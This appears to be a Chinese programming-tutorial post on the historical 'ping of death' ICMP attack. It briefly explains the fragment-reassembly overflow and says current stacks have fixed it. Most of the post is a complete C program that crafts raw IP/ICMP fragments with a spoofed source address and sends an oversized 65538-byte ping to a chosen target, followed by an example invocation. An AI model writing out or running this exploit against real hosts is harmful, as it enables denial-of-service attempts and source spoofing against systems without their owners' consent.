icmp攻击类型ping-of-death

本文主要是介绍icmp攻击类型ping-of-death，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

某些协议栈对于分片报文，事先分配最大IP长度65536字节的缓冲区，而实际接收到的分片在重组时，超过65536的长度将导致缓冲区溢出错误。当前的各个协议栈实现早已修复此问题。

以下程序用于发送超过65536的IP分片报文，首先是头文件部分：

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

其次是初始化初始RAW套接口，以及参数：

int main(int argc, char **argv)
{int s;char buf[1500];const int buflen = 1500;struct ip *ip = (struct ip *)buf;struct icmp *icmp = (struct icmp *)(ip + 1);struct sockaddr_in dst;int offset;int on = 1;if (argc != 3) {fprintf(stderr, "usage: %s source hostname\n", argv[0]);exit(1);}bzero(buf, buflen);if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {perror("socket");exit(1);}if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {perror("IP_HDRINCL");exit(1);}if ((ip->ip_src.s_addr = inet_addr(argv[1])) == -1) {fprintf(stderr, "%s: unknown src address\n", argv[1]);exit(1);}if ((ip->ip_dst.s_addr = inet_addr(argv[2])) == -1) {fprintf(stderr, "%s: unknown dst address\n", argv[2]);exit(1);}printf("Sending to %s", inet_ntoa(ip->ip_dst));printf(" from %s\n", inet_ntoa(ip->ip_src));

初始化IP头部字段，和ICMP信息,类型为（ICMP_ECHO）8，code为0，即ECHO Request（ping）报文：

        ip->ip_v = 4;ip->ip_hl = sizeof *ip >> 2;ip->ip_tos = 0;ip->ip_len = htons(buflen);ip->ip_id = htons(5271);ip->ip_off = htons(0);ip->ip_ttl = 255;ip->ip_p = IPPROTO_ICMP;ip->ip_sum = 0; /* set by protocol stack */dst.sin_addr = ip->ip_dst;dst.sin_family = AF_INET;icmp->icmp_type = ICMP_ECHO;icmp->icmp_code = 0;icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));

最后，发送44个1480字节的分片，共65120字节，第45个分片长度为418字节，总共是65538字节，超过65536的最大长度：

        for (offset = 0; offset < 65536; offset += (buflen - sizeof *ip)/*1480*/) {int slen = buflen;ip->ip_off = htons(offset >> 3); /* divide by 8. */if (offset < 65120/* 1480*44 */) {ip->ip_off |= htons(IP_MF);} else {ip->ip_len = htons(418); /* make total 65538 */slen = 418;}if (sendto(s, buf, slen, 0, (struct sockaddr *)&dst,sizeof dst) < 0) {fprintf(stderr, "offset %d: errno %d", offset, errno);}if (offset == 0)memset(icmp, 0, sizeof(struct icmp));}return 0;
}

编译完成之后，如下调用，需要输入源IP地址，和要攻击的目标IP地址：

$ ./a.out 
usage: ./a.out source hostname
$ 
$ sudo ./a.out 192.168.1.124 192.168.1.109

windows系统在将回复参数错误的ICMP报文，如下图：

这篇关于icmp攻击类型ping-of-death的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---